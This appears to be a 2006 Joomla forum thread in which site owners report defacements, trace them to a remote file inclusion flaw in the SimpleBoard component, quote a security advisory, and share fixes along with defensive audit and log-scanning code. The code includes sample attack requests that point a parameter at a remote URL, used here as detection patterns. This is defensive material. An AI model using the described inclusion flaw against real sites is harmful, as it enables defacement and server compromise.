[UPGRADE AVAIL.] Vulnerability in SIMPLEBOARD
-
- Joomla! Explorer
- Posts: 374
- Joined: Thu Aug 18, 2005 8:54 pm
[UPGRADE AVAIL.] Vulnerability in SIMPLEBOARD
The FacileForms site today also got defaced by somebody calling himself GokTurk, he replaced configuration.php.
We are running joomla 1.0.10. We were before running mambo 4.5.2 and never had any such problem.
From the server logs it could also be a vulnerability in com_docman instead of Joomla itself, but this is yet unconfirmed.
The offending IP was 85.108.211.155, belonging to TurkTelecom. All IPs of TurkTelecom have been locked out from the FacileForms for security, and I highly recommend every Joomla user to do the same until this security hole is fixed. Also make sure your configuration.php is write protected (chmod 444).
Last edited by RobS on Wed Jul 19, 2006 5:01 am, edited 1 time in total.
- RobS
- Joomla! Ace
- Posts: 1366
- Joined: Mon Dec 05, 2005 10:17 am
- Location: New Orleans, LA, USA
- Contact:
Re: WARNING: Vulnerability in SIMPLEBOARD
It would be extremely helpful if you could send me a copy of the relevant log information by PM or contact me by PM and I will give you my email address. I have seen a couple of reports of an issue but have not seen any logs or indication as to what they are actually doing.
Thanks
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions
- PhilTaylor-Prazgod
- Joomla! Ace
- Posts: 1402
- Joined: Sat Aug 20, 2005 12:32 pm
- Location: Jersey, Channel Islands
- Contact:
Re: WARNING: Vulnerability in SIMPLEBOARD
I personally helped someone yesterday who had Joomla 1.0.10 and got hacked - but it was a SimpleBoard hack and not a joomla hack
Phil Taylor
- https://mySites.guru - Manage Multiple Joomla/WordPress Sites In One Dashboard for Security, Audits, Backups and more....
- https://www.phil-taylor.com/
- brian
- Joomla! Master
- Posts: 12785
- Joined: Fri Aug 12, 2005 7:19 am
- Location: Leeds, UK
- Contact:
Re: WARNING: Vulnerability in SIMPLEBOARD
Yes well I posted a known vulnerability announcement in this forum about simpleboard sometime ago.
"Exploited yesterday... Hacked tomorrow"
Blog http://brian.teeman.net/
Joomla Hidden Secrets http://hiddenjoomlasecrets.com/
-
- Joomla! Explorer
- Posts: 374
- Joined: Thu Aug 18, 2005 8:54 pm
Re: WARNING: Vulnerability in SIMPLEBOARD
I cannot exclude simpleboard at this time, but I'm still analyzing the logs.
- RobS
- Joomla! Ace
- Posts: 1366
- Joined: Mon Dec 05, 2005 10:17 am
- Location: New Orleans, LA, USA
- Contact:
Re: WARNING: Vulnerability in SIMPLEBOARD
Correct, there have also been reports of another vulnerability in Simpleboard that we are investigating. From what I understand, Simpleboard isn't maintained for Joomla anymore and was replaced by an offshoot Joomlaboard. I have tried to go to the Simpleboard maintainer's website but it is having issues.
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions
-
- Joomla! Apprentice
- Posts: 5
- Joined: Mon Jul 10, 2006 11:57 am
Re: WARNING: Vulnerability in SIMPLEBOARD
Same problem at one of our sites this morning ... someone calling himself ENO7 TURKISH HACKER replaced the configuration.php with some html code displaying his message and a picture.
We are running joomla 1.0.10 since it was released, there was also phpBB2 component installed, but no simpleboard.
The process is currently under investigation.
Regards,
Mike
- Elpie
- Joomla! Guru
- Posts: 903
- Joined: Wed Aug 17, 2005 11:26 pm
- Contact:
Re: WARNING: Vulnerability in SIMPLEBOARD
Is anyone on your server running php-Nuke Peter? This idiot has mainly gone after php-Nuke sites. GokTurk and the sanalkabus.org attacks have been from the same origin and so far, have relied on incorrect file permissions and register_globals ON to get in.
He is usually very obliging, and tells you which files have been defaced (usually index.php and configuration.php) and doesn't touch anything else. I hope your attack is nothing more than this.
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info
-
- Joomla! Explorer
- Posts: 374
- Joined: Thu Aug 18, 2005 8:54 pm
Re: WARNING: Vulnerability in SIMPLEBOARD
Yes, it finally is simpleboard!
We were running simpleboard, although all in read-only as reference for old posts (we are on SMF since 2 months now)
This is the offending entry from the log file:
Code:
Code removed for security.
I HIGHLY RECOMMEND EVERYBODY WITH SIMPLEBOARD INSTALLED TO DISABLE IT IMMEDIATELY BY RENAMING THE FOLDER /components/com_simpleboard UNTIL A FIX FOR THE PROBLEM IS FOUND. UNPUBLISHING IT WILL NOT HELP, EITHER RENAME AS ADVISED OR UNINSTALL COMPLETELY.
Last edited by Anonymous on Mon Jul 10, 2006 12:47 pm, edited 1 time in total.
- PhilTaylor-Prazgod
- Joomla! Ace
- Posts: 1402
- Joined: Sat Aug 20, 2005 12:32 pm
- Location: Jersey, Channel Islands
- Contact:
Re: WARNING: Vulnerability in SIMPLEBOARD
I saw an example with file_upload.php and not image_upload.php
Phil Taylor
- https://mySites.guru - Manage Multiple Joomla/WordPress Sites In One Dashboard for Security, Audits, Backups and more....
- https://www.phil-taylor.com/
- RobS
- Joomla! Ace
- Posts: 1366
- Joined: Mon Dec 05, 2005 10:17 am
- Location: New Orleans, LA, USA
- Contact:
Re: WARNING: Vulnerability in SIMPLEBOARD
We were made aware of the vulnerability in image_upload a day or two ago. I have since attempted to contact the developers of SimpleBoard/JoomlaBoard but have not heard back as of yet. They should be aware of both issues now.
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions
- RobS
- Joomla! Ace
- Posts: 1366
- Joined: Mon Dec 05, 2005 10:17 am
- Location: New Orleans, LA, USA
- Contact:
Re: WARNING: Vulnerability in SIMPLEBOARD
@Peter Koch,
Could you please PM me the relevant log.
Thank you.
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions
- LorenzoG
- Joomla! Hero
- Posts: 2983
- Joined: Fri Aug 19, 2005 8:46 am
- Location: Stockholm, Sweden
Re: WARNING: Vulnerability in SIMPLEBOARD
Does anyone know if this vulnerability also affects joomlaboard?
Thanks
Industributik - http://www.industributiken.se
- RobS
- Joomla! Ace
- Posts: 1366
- Joined: Mon Dec 05, 2005 10:17 am
- Location: New Orleans, LA, USA
- Contact:
Re: WARNING: Vulnerability in SIMPLEBOARD
I am not sure how long ago the deviation occurred but to be on the safe side, I would assume that it does.
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions
-
- Joomla! Explorer
- Posts: 374
- Joined: Thu Aug 18, 2005 8:54 pm
Re: WARNING: Vulnerability in SIMPLEBOARD
Rob, I am preparing a complete log of all his activities and will PM it to you in short.
-
- Joomla! Explorer
- Posts: 251
- Joined: Mon Sep 05, 2005 3:50 pm
Re: WARNING: Vulnerability in SIMPLEBOARD
To be on the safe side, I've renamed my com_joomlaboard directories, but after reviewing the SimpleBoard and the JoomlaBoard code, I believe this is a SimpleBoard only problem. Unfortunately since the exploit has been edited from the forum and I'm not one of those people "in the know" I can't say for certain.
RobS (or anyone else) - If you need an extra hand investigating this, feel free to contact me. I'm on the east coast of the US so my day is just starting.
david
- RobS
- Joomla! Ace
- Posts: 1366
- Joined: Mon Dec 05, 2005 10:17 am
- Location: New Orleans, LA, USA
- Contact:
Re: WARNING: Vulnerability in SIMPLEBOARD
Upon further investigation and a helpful suggestion by Elpie and Counterpoint at mamboguru.com who posted this http://forum.joomla.org/index.php/topic,75390.0.html
It seems that the problem that is facing both com_extcalender and com_simpleboard is a lack of valid component checking, making it possible to call the PHP files for those components directly and, additionally, include more PHP from a remote site into the code to execute.
I have checked Simpleboard 1.1.0 and it does have this problem; however, Joomlaboard 1.1.2 should NOT be affected by this problem. You have a couple of options for dealing with this problem:
1. Update your Simpleboard installations to Joomlaboard.
2. Manually insert the necessary code into all files installed by Simpleboard and com_ExtCalendar (Extended Calender 2) if you happen to be running that.
This code should be in all files installed by com_simpleboard and com_extcalender. Basically, everything in /path/to/Joomla/components/com_extcalender, /path/to/Joomla/administrator/components/com_extcalender, /path/to/Joomla/components/com_simpleboard, and /path/to/Joomla/administrator/components/com_simpleboard
Code:
// no direct access
defined( '_VALID_MOS' ) or die( 'Restricted access' );
Refer to this link for more information about extCalender: http://forum.joomla.org/index.php/topic,75390.0.html
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions
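One way to check an installation for component files that still lack the guard quoted in the post above. This is an added example, not code from the thread or from the Joomla! project; the function names, the default component list and the constructed sample tree are assumptions for illustration.

```python
import os
import re
import tempfile

# The guard from the post; PHP keywords are case-insensitive, the constant is not.
GUARD = re.compile(
    r"""(?i:defined)\s*\(\s*['"]_VALID_MOS['"]\s*\)\s*(?i:or|\|\|)\s*(?i:die|exit)\b"""
)
# Whitespace and PHP comments that may precede the first statement.
LEADING = re.compile(r"(?:\s+|/\*.*?\*/|(?://|#)[^\n]*)*", re.DOTALL)
OPEN_TAG = re.compile(r"<\?(?:php\b)?", re.IGNORECASE)
# Directory names as written in the post.
COMPONENTS = ("com_simpleboard", "com_extcalender")


def needs_guard(source):
    """True if the file contains PHP whose first statement is not the guard."""
    tag = OPEN_TAG.search(source)
    if tag is None:
        return False  # no PHP code, nothing runs on a direct request
    rest = source[tag.end():]
    rest = rest[LEADING.match(rest).end():]
    # Other guard spellings (e.g. an if-block) are reported for manual review.
    return GUARD.match(rest) is None


def audit(root, components=COMPONENTS):
    """Return sorted paths (relative to root) of .php files lacking the guard."""
    missing = []
    for area in ("components", os.path.join("administrator", "components")):
        for component in components:
            for folder, _dirs, files in os.walk(os.path.join(root, area, component)):
                for name in files:
                    if not name.lower().endswith(".php"):
                        continue
                    path = os.path.join(folder, name)
                    with open(path, encoding="latin-1") as handle:
                        if needs_guard(handle.read()):
                            missing.append(os.path.relpath(path, root))
    return sorted(missing)


def build_sample_tree(root):
    """Write a small constructed tree (not real SimpleBoard code) for the demo."""
    guard = "// no direct access\ndefined( '_VALID_MOS' ) or die( 'Restricted access' );\n"
    samples = {
        "components/com_simpleboard/simpleboard.php": "<?php\n" + guard + "echo 'board';\n",
        "components/com_simpleboard/image_upload.php": "<?php\n/* upload form */\necho 'form';\n",
        "administrator/components/com_simpleboard/admin.simpleboard.php":
            "<?php defined('_VALID_MOS') OR die();\n",
        "components/com_simpleboard/notes.php": "<p>static page</p>\n",
        "components/com_other/other.php": "<?php echo 'not in scope';\n",
    }
    for rel, text in samples.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="latin-1") as handle:
            handle.write(text)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as demo_root:
        build_sample_tree(demo_root)
        for rel in audit(demo_root):
            print("missing guard:", rel)
```

Files reported here are candidates for the manual fix in option 2; a file that uses a different guard spelling is also listed and needs a look by hand.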
-
- Joomla! Fledgling
- Posts: 1
- Joined: Mon Jul 10, 2006 4:24 pm
Re: WARNING: Vulnerability in SIMPLEBOARD
TITLE:
Mambo SimpleBoard Component "sbp" File Inclusion Vulnerability
CRITICAL:
Highly critical
IMPACT:
System access
WHERE:
From remote
SOFTWARE:
SimpleBoard 1.x (component for Mambo)
http://secunia.com/product/10318/
DESCRIPTION:
h4ntu has discovered a vulnerability in the SimpleBoard component for
Mambo, which can be exploited by malicious people to compromise a
vulnerable system.
Input passed to the "sbp" parameter in
components/com_simpleboard/image_upload.php isn't properly verified,
before it is used to include files. This can be exploited to include
arbitrary files from external and local resources.
Successful exploitation requires that "register_globals" is enabled.
The vulnerability has been confirmed in version 1.1.0. Other versions
may also be affected.
SOLUTION:
Edit the source code to ensure that input is properly verified.
Set "register_globals" to "Off".
PROVIDED AND/OR DISCOVERED BY:
h4ntu
ORIGINAL ADVISORY:
http://milw0rm.com/exploits/1994
Anyone can tell me where I should moderate the file?
EDIT: Topic merged
Last edited by infograf768 on Mon Jul 10, 2006 4:55 pm, edited 1 time in total.
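A detection sketch for the pattern the advisory describes: a component script requested by path instead of through index.php, with a parameter whose value is a remote URL. This is an added example, not part of the original thread; the log lines are constructed (documentation IP ranges, example.invalid host), an Apache combined log format is assumed, and the level names are labels chosen for this example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request part of an Apache combined-format access log line.
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A component script requested by path instead of through index.php.
DIRECT = re.compile(
    r"^/(?:administrator/)?components/(?P<component>com_[^/]+)/.+\.php$",
    re.IGNORECASE,
)
# A parameter value that is itself a remote URL.
REMOTE = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)


def classify(line):
    """Return a finding dict for a direct component request, else None."""
    m = LINE.match(line)
    if m is None:
        return None
    url = urlsplit(m["target"])
    hit = DIRECT.match(unquote(url.path))
    if hit is None:
        return None
    # parse_qsl percent-decodes values, so encoded URLs are caught as well.
    remote = [k for k, v in parse_qsl(url.query, keep_blank_values=True)
              if REMOTE.match(v)]
    status = int(m["status"])
    if remote and status == 200:
        level = "investigate"    # script was served with a URL-valued parameter
    elif remote:
        level = "attempt"        # e.g. 404 after the folder was renamed
    else:
        level = "direct-access"  # bypassed index.php, no URL-valued parameter
    return {"ip": m["ip"], "component": hit["component"].lower(),
            "path": url.path, "status": status,
            "remote_params": remote, "level": level}


def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, lines) if f is not None]


# Constructed sample lines, not taken from any real server log.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Jul/2006:09:14:02 +0200] '
    '"GET /index.php?option=com_simpleboard&Itemid=5 HTTP/1.1" 200 18233',
    '198.51.100.7 - - [10/Jul/2006:09:15:40 +0200] '
    '"GET /components/com_simpleboard/image_upload.php'
    '?sbp=http%3A%2F%2Fexample.invalid%2Fa.txt HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Jul/2006:11:02:19 +0200] '
    '"GET /components/com_simpleboard/image_upload.php'
    '?sbp=http://example.invalid/a.txt HTTP/1.1" 404 209',
    '203.0.113.4 - - [10/Jul/2006:11:30:00 +0200] '
    '"GET /components/com_simpleboard/file_upload.php HTTP/1.1" 200 77',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["level"], finding["ip"], finding["path"], finding["remote_params"])
```

A 200 status only shows the script was served, not that the include succeeded, so an "investigate" finding is a prompt to check file modification times on index.php and configuration.php.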
- RobS
- Joomla! Ace
- Posts: 1366
- Joined: Mon Dec 05, 2005 10:17 am
- Location: New Orleans, LA, USA
- Contact:
Re: WARNING: Vulnerability in SIMPLEBOARD
We are aware of the problem and have addressed it in other topics on this board.
See: http://forum.joomla.org/index.php/topic,75390.0.html
And: http://forum.joomla.org/index.php/topic,75668.0.html
EDIT: Topic merged
Last edited by infograf768 on Mon Jul 10, 2006 4:55 pm, edited 1 time in total.
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions
-
- Joomla! Enthusiast
- Posts: 218
- Joined: Fri Feb 17, 2006 4:30 pm
- Contact:
Re: WARNING: Vulnerability in SIMPLEBOARD
Thanks for the update folks. Very helpful information.
I would like to know what is the effect to joomla if Global_register is OFF?
Need to do more research on this board I guess.
[ http://www.MOSCOM.COM ] WebHosting 24x7 Phone Support.
[ http://www.KING.NET ] My Project ... converting to 1.6
- RobS
- Joomla! Ace
- Posts: 1366
- Joined: Mon Dec 05, 2005 10:17 am
- Location: New Orleans, LA, USA
- Contact:
Re: WARNING: Vulnerability in SIMPLEBOARD
None, Joomla! does not require register globals.
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions
-
- Joomla! Enthusiast
- Posts: 218
- Joined: Fri Feb 17, 2006 4:30 pm
- Contact:
Re: WARNING: Vulnerability in SIMPLEBOARD
RobS wrote: None, Joomla! does not require register globals.
thanks robs.
[ http://www.MOSCOM.COM ] WebHosting 24x7 Phone Support.
[ http://www.KING.NET ] My Project ... converting to 1.6
-
- Joomla! Apprentice
- Posts: 25
- Joined: Tue Nov 15, 2005 4:59 pm
Re: WARNING: Vulnerability in SIMPLEBOARD
had the same issues. the css files weren't loading either. then i renamed the simpleboard folder and it's fixed itself. weird.
and i thought i was the only one to be affected.
- brian
- Joomla! Master
- Posts: 12785
- Joined: Fri Aug 12, 2005 7:19 am
- Location: Leeds, UK
- Contact:
Re: WARNING: Vulnerability in SIMPLEBOARD
Can I respectfully suggest that people subscribe to this forum for notifications of new posts.
I reported the vulnerability in simpleboard back on June 2
"Exploited yesterday... Hacked tomorrow"
Blog http://brian.teeman.net/
Joomla Hidden Secrets http://hiddenjoomlasecrets.com/
-
- Joomla! Explorer
- Posts: 374
- Joined: Thu Aug 18, 2005 8:54 pm
Re: WARNING: Vulnerability in SIMPLEBOARD
brian wrote: Can I respectfully suggest that people subscribe to this forum for notifications of new posts. I reported the vulnerability in simpleboard back on June 2
You are perfectly right about the subscription.
However may I respectfully remark we are discussing here a new issue classified as highly critical in http://secunia.com/advisories/20981/, and not the moderately critical issue you posted back in June.
- brian
- Joomla! Master
- Posts: 12785
- Joined: Fri Aug 12, 2005 7:19 am
- Location: Leeds, UK
- Contact:
Re: WARNING: Vulnerability in SIMPLEBOARD
Maybe so but the previous warning was still ignored.
"Exploited yesterday... Hacked tomorrow"
Blog http://brian.teeman.net/
Joomla Hidden Secrets http://hiddenjoomlasecrets.com/
-
- Joomla! Explorer
- Posts: 374
- Joined: Thu Aug 18, 2005 8:54 pm
Re: WARNING: Vulnerability in SIMPLEBOARD
brian wrote: Maybe so but the previous warning was still ignored.
I think it would be a wonderful new option for joomla to automatically get a security warning when logging into the backend and one of the installed components has been detected as vulnerable. Joomla (and mambo) has all information such as component / mambot / module names and versions already, and also all php / mysql / apache information so nothing really stands against an implementation.
After all the latest security issues around joomla / mambo and its hundreds of add-ons there should urgently be something done to improve security even for those ten-thousands of users that never visit a forum or ask secunia.
But I guess this is not the thread to discuss it.
- brian
- Joomla! Master
- Posts: 12785
- Joined: Fri Aug 12, 2005 7:19 am
- Location: Leeds, UK
- Contact:
Re: WARNING: Vulnerability in SIMPLEBOARD
You are right. Perhaps if there was an rss feed filter component written for the admin that would read secunia and this forum for security announcements filtered on the words joomla
"Exploited yesterday... Hacked tomorrow"
Blog http://brian.teeman.net/
Joomla Hidden Secrets http://hiddenjoomlasecrets.com/
- PhilTaylor-Prazgod
- Joomla! Ace
- Posts: 1402
- Joined: Sat Aug 20, 2005 12:32 pm
- Location: Jersey, Channel Islands
- Contact:
Re: WARNING: Vulnerability in SIMPLEBOARD
brian wrote: You are right. Perhaps if there was an rss feed filter component written for the admin that would read secunia and this forum for security announcements filtered on the words joomla
I already have this set up in feeddemon :-)
Phil Taylor
- https://mySites.guru - Manage Multiple Joomla/WordPress Sites In One Dashboard for Security, Audits, Backups and more....
- https://www.phil-taylor.com/
- Elpie
- Joomla! Guru
- Posts: 903
- Joined: Wed Aug 17, 2005 11:26 pm
- Contact:
Re: WARNING: Vulnerability in SIMPLEBOARD
Me too - mine's called "eyes"
Although, I have to say, with this latest crop of vulnerabilities I am spending some time hanging out with blackhats lately and find a quick daily check of proof of concept exploits has been very interesting.
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info